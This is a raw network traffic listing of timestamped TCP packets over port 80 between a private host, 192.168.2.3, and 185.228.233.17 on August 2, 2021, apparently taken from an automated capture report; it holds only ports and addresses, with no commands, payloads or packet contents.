Aug 2, 2021 22:06:42.130305052 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.135081053 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.135154009 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.135355949 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.137670040 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.137715101 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.137849092 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.186408997 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.186463118 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.186501980 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.186537981 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.186574936 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.186613083 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.186661005 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.186703920 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.186769009 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.186815023 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.186846018 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.191994905 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.192034960 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.192070961 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.192117929 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.192184925 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.192295074 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.194896936 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.194945097 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.194986105 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.195020914 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.195131063 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.195256948 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.207799911 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.208784103 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.208830118 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.208961010 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.211301088 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.211415052 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.247251034 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.247318983 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.247370005 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.247426033 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.247471094 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.247478962 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.247508049 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.247546911 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.247570992 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.247584105 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.247620106 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.247656107 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.247692108 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.247704983 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.247736931 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.247770071 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.247776985 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.247834921 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.252703905 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.252743006 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.252779961 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.252824068 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.252893925 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.255108118 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.256268978 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.256373882 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.256881952 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.261050940 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.261173010 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.263024092 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.264233112 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.264336109 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.269231081 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.270325899 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.270446062 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.270509958 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.271755934 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.271852970 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.276807070 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.277959108 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.278048038 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.279237986 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.287863970 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.288070917 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.294068098 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.295236111 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.295291901 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.295411110 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.298975945 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.299104929 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.301331043 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.303791046 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.303983927 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.306361914 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.306411028 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.306510925 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.307369947 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.308996916 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.309137106 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.311492920 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.312567949 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.312776089 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.314048052 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.316349030 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.316499949 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.316509008 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.319061041 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.319209099 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.321317911 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.321432114 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.321537971 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.323909998 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.323950052 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.324052095 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.326456070 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.329421043 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.329479933 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.329607964 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.331674099 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.331814051 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.335488081 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.337304115 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.337343931 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.337491989 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.339843035 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.339975119 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.341186047 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.343740940 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.343915939 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.347111940 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.348480940 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.348689079 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.352206945 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.353348970 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.353514910 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.354569912 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.360874891 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.360918045 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.361004114 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.364645958 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.364837885 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.364845991 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.367373943 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.367505074 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.368417025 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.369908094 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.369963884 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.370032072 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.373586893 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.373636007 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.373712063 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.374655962 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.374872923 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.374946117 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.376296997 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.376403093 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.377304077 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.378334999 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.378870964 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.380896091 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.380955935 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.381079912 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.381850958 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.384840012 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.384881973 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.384958029 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.387548923 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.387763977 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.393351078 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.393472910 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.393615961 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.398288965 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.402389050 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.402586937 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.406111002 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.407174110 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.408049107 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.408473969 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.412363052 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.412539959 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.413311958 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.413378954 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.413578987 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.417737007 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.419040918 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.419101954 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.419245005 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.422455072 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.422511101 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.422662020 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.428507090 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.428666115 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.428711891 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.429928064 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.430042028 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.431240082 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.432266951 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.432368040 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.432368994 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.434750080 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.434838057 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.435076952 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.437391043 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.437529087 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.438528061 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.439894915 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.440553904 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.441060066 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.442588091 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.443543911 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.445143938 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.445250988 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.446043015 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.450021982 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.450287104 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.450335026 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.450444937 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.452647924 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.453576088 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.454118013 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.454184055 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.454286098 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.458918095 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.458967924 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.459074974 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.461386919 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.462450981 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.462549925 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.464034081 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.468713045 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.469069004 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.471532106 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.472692013 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.472779989 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.472819090 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.475354910 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.476526976 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.478800058 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.480024099 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.480149984 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.480240107 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.483727932 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.483941078 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.484133959 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.485409975 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.485538006 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.487926960 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.489125967 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.489294052 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.490426064 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.491605997 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.491695881 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.494239092 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.495434999 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.495476961 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.495521069 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.497776031 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.497855902 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.497895956 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.501452923 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.501583099 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.501703978 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.501753092 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.501851082 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.503976107 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.504183054 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.504298925 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.504473925 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.562230110 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.979593039 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.037743092 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.037964106 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.038395882 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.138323069 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.575387001 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.575453043 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.575773001 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.576416016 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.576476097 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.576585054 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.578926086 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.580087900 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.580204010 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.581146002 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.582367897 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.582442999 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.583523035 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.583560944 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.583632946 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.634000063 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.634044886 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.634094954 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.634138107 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.634195089 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.634237051 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.634706974 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.634839058 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.634876966 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.634917974 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.634924889 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.634983063 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.638365030 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.638415098 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.638459921 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.638498068 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.638505936 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.638552904 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.640640020 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.640681028 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.640724897 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.640764952 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.640782118 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.640866041 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.658090115 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.658137083 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.658231974 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.659044981 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.660285950 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.660393000 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.692503929 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.692548037 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.692589045 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.692630053 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.692677021 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.692707062 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.692719936 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.692738056 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.692759991 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.692796946 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.692867994 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.692909956 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.692971945 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.693021059 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.693063021 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.693095922 CEST	49745	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:43.693099022 CEST	80	49745	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:43.693128109 CEST	80	49745	185.228.233.17	192.168.2.3
